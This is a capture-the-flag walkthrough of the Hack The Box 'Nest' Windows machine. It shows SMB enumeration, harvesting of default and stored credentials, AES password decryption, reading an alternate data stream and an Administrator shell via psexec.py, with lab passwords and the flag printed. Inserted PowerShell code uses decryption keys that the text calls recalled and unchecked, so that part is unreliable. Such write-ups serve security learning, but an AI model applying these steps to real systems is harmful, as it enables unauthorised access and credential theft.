htb-nest-nl

Hack The Box Nest (IP: 10.10.10.178) is a recently released Windows machine. The unintended way to own the box with Metasploit no longer works, because the HTB team has patched the machine.

RECONNAISSANCE

I was recently introduced to a tool called AutoRecon: https://github.com/Tib3rius/AutoRecon . It produces a tidy set of text reports, with the results correctly categorised into separate folders.

Before leaving AutoRecon to its work, I used nmap to start the scan. The default top-1000 scan below shows only SMB on 445/tcp (note the SMB2 security mode: message signing is enabled but not required, the setting that leaves SMB open to relay attacks); the second open port, 4386/tcp, lies outside nmap's default port list and only shows up in the full-port scan.

root@kali:~/htb/nest# nmap -sS -sV -sC -oN nmap.txt -Pn 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 03:44 EST
Nmap scan report for nest.htb (10.10.10.178)
Host is up (0.086s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 1m45s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-04T08:47:09
|_  start_date: 2020-02-04T05:55:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.37 seconds
root@kali:/opt/AutoRecon/results/10.10.10.178/scans# cat smbmap-share-permissions.txt
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.178...
[+] IP: 10.10.10.178:445    Name: nest.htb
    Disk                    Permissions
    ----                    -----------
    [!] Access Denied
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445    Name: nest.htb
    Disk                    Permissions
    ----                    -----------
    ADMIN$                  NO ACCESS
    C$                      NO ACCESS
    Data                    READ ONLY
    IPC$                    NO ACCESS
    Secure$                 NO ACCESS
    Users                   READ ONLY
root@kali:/opt/AutoRecon/results/10.10.10.178/scans# cat smbmap-list-contents.txt
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.178...
[+] IP: 10.10.10.178:445    Name: nest.htb
    Disk                    Permissions
    ----                    -----------
    [!] Access Denied
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445    Name: nest.htb
    Disk                    Permissions
    ----                    -----------
    ADMIN$                  NO ACCESS
    C$                      NO ACCESS
    Data                    READ ONLY
    .\
    dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
    dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
    dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
    dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
    dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
    dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
    .\\Shared\
    dr--r--r--                0 Wed Aug  7 15:07:51 2019    .
    dr--r--r--                0 Wed Aug  7 15:07:51 2019    ..
    dr--r--r--                0 Wed Aug  7 15:07:33 2019    Maintenance
    dr--r--r--                0 Wed Aug  7 15:08:07 2019    Templates
    .\\Shared\Maintenance\
    dr--r--r--                0 Wed Aug  7 15:07:33 2019    .
    dr--r--r--                0 Wed Aug  7 15:07:33 2019    ..
    -r--r--r--               48 Wed Aug  7 15:07:32 2019    Maintenance Alerts.txt
    .\\Shared\Templates\
    dr--r--r--                0 Wed Aug  7 15:08:07 2019    .
    dr--r--r--                0 Wed Aug  7 15:08:07 2019    ..
    dr--r--r--                0 Wed Aug  7 15:08:10 2019    HR
    dr--r--r--                0 Wed Aug  7 15:08:07 2019    Marketing
    .\\Shared\Templates\HR\
    dr--r--r--                0 Wed Aug  7 15:08:10 2019    .
    dr--r--r--                0 Wed Aug  7 15:08:10 2019    ..
    -r--r--r--              425 Wed Aug  7 18:55:36 2019    Welcome Email.txt
    IPC$                    NO ACCESS
    Secure$                 NO ACCESS
    Users                   READ ONLY
    .\
    dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
    dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
    dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
    dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
    dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
    dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
    dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser

Several shares are readable as guest. Under Shared\Templates\HR there is a Welcome Email.txt that looks like the template HR sends to newly joined employees, and it contains a default username and password: TempUser:welcome2019

With credentials for a standard user, I went on exploring the shares and found an interesting XML configuration file under \IT\Configs\RU Scanner\. It holds credentials for the user C.Smith, with the password stored in an encrypted form:

c.smith:fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=

I spent a few minutes trying online tools on the password, which got me nowhere, so I decided to spend the time on the machine instead. I had been given a hint to look for useful files in the Data\IT\Carl\VB Projects folder, so I did.

The NotepadPlusPlus folder contains two XML files. One is config.xml, whose <History> section at the end records the user's recently opened files. The list shows that TempUser opened a file called “Temp.txt” from another user's folder, “Carl”. When I tried to list the IT folder I was denied, but I could list Carl's folder directly by path. Worth remembering: a denied directory listing does not mean you cannot enter a subfolder whose name you already know, which is what makes recent-file lists like this one so useful.

OBTAIN USER

Since the machine was unstable at the time, I downloaded the entire “VB Projects” folder to my own machine to work through it locally. It contains two subfolders, Production and WIP. WIP holds a Visual Basic project called “RU Scanner”. I copied the whole folder to my Windows host and opened the project in Visual Studio.

Going through the code I noticed that the program contains the decryption routine for these configuration values, so it should be able to decrypt the C.Smith password found earlier.

When I tried to debug the project I got the error below: a configuration file has to be loaded first. I could not find that file, so I removed the loading step from the main module and hard-coded the username and encrypted password I had found.

My edited main function in Module1 is shown below. After changing the code I set a breakpoint on End Sub so that the debugger stops there, and read the decrypted password from the local variables.

Now I have the password of user C.Smith: xRxRxPANCAK3SxRxRx.

C.Smith has a “HQK Reporting” folder, inside there are some files and a folder that seemed interesting, let’s download it.

ALTERNATE DATA STREAMS (ADS):

The file “Debug Mode Password.txt” in HQK Reporting is an example of an NTFS Alternate Data Stream.

Every NTFS file has an unnamed data stream (::$DATA), which is what a directory listing reports as the file's content and size; a file can additionally carry named streams that a plain listing never shows. Here the unnamed stream is empty, so the file appears to be 0 bytes, while the debug-mode password sits in a named stream.

To read it, the file has to be fetched from Windows over SMB (or with a client that understands streams): a plain copy made through your *nix box keeps only the unnamed stream, and the downloaded file is useless. smbclient can cope as well: allinfo "Debug Mode Password.txt" lists the streams, and get "Debug Mode Password.txt:Password" fetches one.

I used Map Network Drive to mount \\10.10.10.178\Users\C.Smith\ and copied the file straight to my host. In PowerShell, Get-Item with -Stream * lists the stream names and reveals a stream called “Password”; Get-Content (the type alias) with -Stream Password then reads it. In our case the password is: WBQ201953D8w
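As an added example (my code, not from the original post), the PowerShell below generalises the two commands above into a function that walks a whole downloaded share copy and reports every file carrying a named stream, so a hidden stream on some other file is not missed. It must run on Windows against an NTFS path; the temporary demo file is constructed here, and the Z: drive letter in the usage comment is an assumption.

```powershell
# Added example: enumerate every named NTFS stream under a path and read it.
# Needs an NTFS volume on Windows (a share mapped as a drive letter works);
# a copy that went through a Linux host has already lost the streams.
function Find-AlternateDataStreams {
    param([Parameter(Mandatory)][string]$Path)

    Get-ChildItem -LiteralPath $Path -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * returns one object per stream; ':$DATA' is the ordinary content
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    [pscustomobject]@{
                        File       = $file.FullName
                        MainSize   = $file.Length      # 0 bytes for "Debug Mode Password.txt"
                        Stream     = $_.Stream
                        StreamSize = $_.Length
                        Content    = Get-Content -LiteralPath $file.FullName -Stream $_.Stream -Raw
                    }
                }
        }
}

# Self-check on a constructed file: empty main stream, secret in a named stream
$dir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$demo = Join-Path $dir 'Debug Mode Password.txt'
New-Item -ItemType File -Path $demo -Force | Out-Null           # main stream: 0 bytes
Set-Content -LiteralPath $demo -Stream Password -Value 'not-the-real-password'
"main stream size: $((Get-Item -LiteralPath $demo).Length)"    # reports 0
Find-AlternateDataStreams -Path $dir | Format-List

# Real use, with \\10.10.10.178\Users mapped as Z: (assumed drive letter):
# Find-AlternateDataStreams -Path 'Z:\C.Smith' | Format-List
```

Run it over the whole mapped user folder rather than the one file you already know about; named streams survive copies made with robocopy or Windows Explorer but not copies made through a Linux host.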

I used telnet to connect to the second port (4386/tcp) found during recon. After connecting, I used the debug password to enable debug mode, which unlocks extra commands; showquery 2 then printed the LDAP query configuration, including the Administrator password in the same kind of encrypted blob as before:

>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

DECOMPILING THE BINARY

The administrator password can be decrypted with HqkLdap.exe, the binary in C.Smith's HQK Reporting folder. It can be downloaded to your Windows machine through a mapped network drive, or after locating the share with the net view command from a command prompt.

I copied the file to a folder on my desktop through the mapped drive. The binary is a .NET assembly, so it can be decompiled with any .NET decompiler,

for example dnSpy: https://github.com/0xd4d/dnSpy/releases

I opened the file in dnSpy and started with MainModule(). The two warning messages in the screenshot below caught my attention:

To run the binary we need two things, otherwise it exits: a configuration file and a file named “HqDbImport.exe”. The configuration file is in the LDAP folder and can simply be copied into Notepad to make a duplicate. I could not find HqDbImport.exe anywhere, and nowhere in MainModule's argument handling is that file actually invoked, so I made a copy of HqkLdap.exe, renamed it HqDbImport.exe and put both in a separate folder. I created a .config file with the content below.

So now I have three files in the new folder, ready to decrypt the admin password:

Running the binary from the command line against that config immediately returned the decrypted administrator password.

Administrator:XtH4nkS4Pl4y1nGX

Now for the final step, root. I used Impacket's psexec.py to log in as Administrator.
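Instead of debugging the project in Visual Studio or running a patched copy of HqkLdap.exe, the decrypt routine can be reproduced outside both. As an added example (my code, not from the post or from the projects) the PowerShell below re-implements the .NET pattern the programs use: Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1) over a passphrase and salt to derive a 256-bit key, then AES-CBC with a fixed ASCII IV and PKCS7 padding. It serves both the C.Smith password above and the Administrator password from showquery. The passphrase, salt, iteration count and IV are not shown on this page; the values in the usage section are the ones I recall from the Decrypt calls in the RU Scanner and HqkLdap sources and must be checked against your own copy before the output is trusted. The function name is mine.

```powershell
# Added example: PowerShell port of the .NET Decrypt(cipherText, passPhrase,
# saltValue, passwordIterations, initVector, keySize) routine used by both
# RU Scanner and HqkLdap. Not the projects' own code.
function Unprotect-AesString {
    param(
        [Parameter(Mandatory)][string]$CipherText,   # base64 blob from the config
        [Parameter(Mandatory)][string]$PassPhrase,
        [Parameter(Mandatory)][string]$SaltValue,
        [Parameter(Mandatory)][int]$Iterations,
        [Parameter(Mandatory)][string]$InitVector,   # 16 ASCII characters
        [int]$KeySize = 256
    )
    $ivBytes     = [System.Text.Encoding]::ASCII.GetBytes($InitVector)
    $saltBytes   = [System.Text.Encoding]::ASCII.GetBytes($SaltValue)
    $cipherBytes = [Convert]::FromBase64String($CipherText)

    if ($ivBytes.Length -ne 16) { throw "IV must be 16 bytes, got $($ivBytes.Length)" }
    if ($cipherBytes.Length % 16 -ne 0) { throw "ciphertext is not a whole number of AES blocks" }

    # Rfc2898DeriveBytes = PBKDF2-HMAC-SHA1, the same KDF the VB code calls
    $kdf      = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($PassPhrase, $saltBytes, $Iterations)
    $keyBytes = $kdf.GetBytes([int]($KeySize / 8))

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    try {
        $decryptor  = $aes.CreateDecryptor($keyBytes, $ivBytes)
        $plainBytes = $decryptor.TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)
        return [System.Text.Encoding]::UTF8.GetString($plainBytes)
    }
    catch [System.Security.Cryptography.CryptographicException] {
        # A padding failure almost always means the parameters do not match the encryptor
        throw "decryption failed (padding check): passphrase/salt/IV/iterations probably wrong. $_"
    }
    finally {
        $aes.Dispose()
    }
}

# Parameters NOT on this page: recalled from the two projects' Decrypt(...) calls.
# Verify them against your own copy of the source before trusting the result.
$ruScanner = @{ PassPhrase = 'N3st22'; SaltValue = '88552299'; Iterations = 2; InitVector = '464R5DFA5DL6LE28' }
$hqkLdap   = @{ PassPhrase = '667912'; SaltValue = '1313Rf99'; Iterations = 3; InitVector = '1L1SA61493DRV53Z' }

# Blobs from the page: RU Scanner config (C.Smith) and showquery 2 (Administrator)
Unprotect-AesString -CipherText 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=' @ruScanner
Unprotect-AesString -CipherText 'yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=' @hqkLdap
```

The underlying weakness is that the key material (passphrase, salt and IV) is hard-coded in the binaries, so anyone holding the program, or a decompiler, can recover every password it has ever protected; a wrong parameter set shows up as a padding error rather than as garbage, which is why the function surfaces that case explicitly.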

root@kali:~/htb/nest# psexec.py Administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file wqVdOFDs.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service AGLN on 10.10.10.178.....
[*] Starting service AGLN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop> type root.txt
6594c2eb084bc0f08a42f0b94b878c41
c:\Users\Administrator\Desktop>

Author: Puckiestyle
